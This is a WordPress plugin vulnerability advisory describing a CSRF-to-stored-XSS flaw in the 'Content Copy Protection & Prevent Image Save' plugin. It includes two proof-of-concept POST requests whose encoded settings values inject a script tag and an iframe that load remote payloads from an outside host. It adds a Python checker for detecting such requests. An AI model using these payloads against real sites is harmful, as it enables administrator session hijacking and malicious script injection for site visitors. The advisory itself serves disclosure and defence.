WordPress Plugin Vulnerabilities

Content Copy Protection & Prevent Image Save <= 1.3 - CSRF to Stored Cross-Site Scripting (XSS)

Description

The plugin does not check for CSRF when saving its settings, nor does it perform any validation or sanitisation on them, allowing attackers to make a logged-in administrator set arbitrary XSS payloads in them.

Proof of Concept

### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Image saving disabled message text: ]

[!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cookie: [admin cookies]

select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&CTRLS=1&cmenu=1&no_menu_msg=PoC+by+m0ze&Save_Options=++Update+Options++



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Context menu disabled message text: ]

[!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Cookie: [admin cookies]

select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=PoC+by+m0ze&CTRLS=1&cmenu=1&no_menu_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++
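
Added example (not part of the original advisory or of the plugin's code): a Python check a defender could run over captured requests to this settings page, flagging cross-origin submissions and markup in the two message fields the PoCs use. The sample requests, the Origin/Referer comparison and the flagged character set are assumptions made for illustration.

```python
from urllib.parse import parse_qs, urlsplit

PLUGIN_PAGE = "Prevent_Content_Copy_and_Image_Save.php"  # from the PoC request line
MESSAGE_FIELDS = ("image_save_msg", "no_menu_msg")       # settings the PoCs write to
MARKUP_CHARS = set("<>\"'")  # assumption: a plain notice text never needs these

def audit_settings_post(raw_request):
    """Return a list of findings for one captured HTTP request ([] = nothing flagged)."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    if len(parts) < 2 or parts[0] != "POST":
        return []
    url = urlsplit(parts[1])
    if not url.path.endswith("/wp-admin/options-general.php") or parse_qs(url.query).get("page") != [PLUGIN_PAGE]:
        return []  # not a save request for this plugin's settings page
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    findings = []
    # CSRF signal: the form was submitted from a different origin than the site.
    source = headers.get("origin") or headers.get("referer")
    if source and urlsplit(source).netloc.lower() != headers.get("host", "").lower():
        findings.append(f"cross-origin submission from {urlsplit(source).netloc}")
    # Stored XSS signal: markup characters in the free-text message settings.
    params = parse_qs(body.strip(), keep_blank_values=True)  # also URL-decodes values
    for field in MESSAGE_FIELDS:
        for value in params.get(field, []):
            bad = sorted(MARKUP_CHARS.intersection(value))
            if bad:
                findings.append(f"{field} contains markup characters {''.join(bad)}")
    return findings

# Constructed sample requests (not taken from real traffic).
FORGED = (
    "POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1\n"
    "Host: example.com\n"
    "Origin: https://other.example\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "saveimg=1&image_save_msg=%22%3E%3Cb%3Ex%3C%2Fb%3E&no_menu_msg=Right+click+disabled"
)
BENIGN = FORGED.replace("https://other.example", "https://example.com").replace("%22%3E%3Cb%3Ex%3C%2Fb%3E", "Saving+disabled")

if __name__ == "__main__":
    print(audit_settings_post(FORGED))
    print(audit_settings_post(BENIGN))
```
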

Miscellaneous

Original Researcher: m0ze
Submitter: m0ze
Verified: Yes

Timeline

Publicly Published: 2021-04-12
Added: 2021-05-17
Last Updated: 2021-05-24
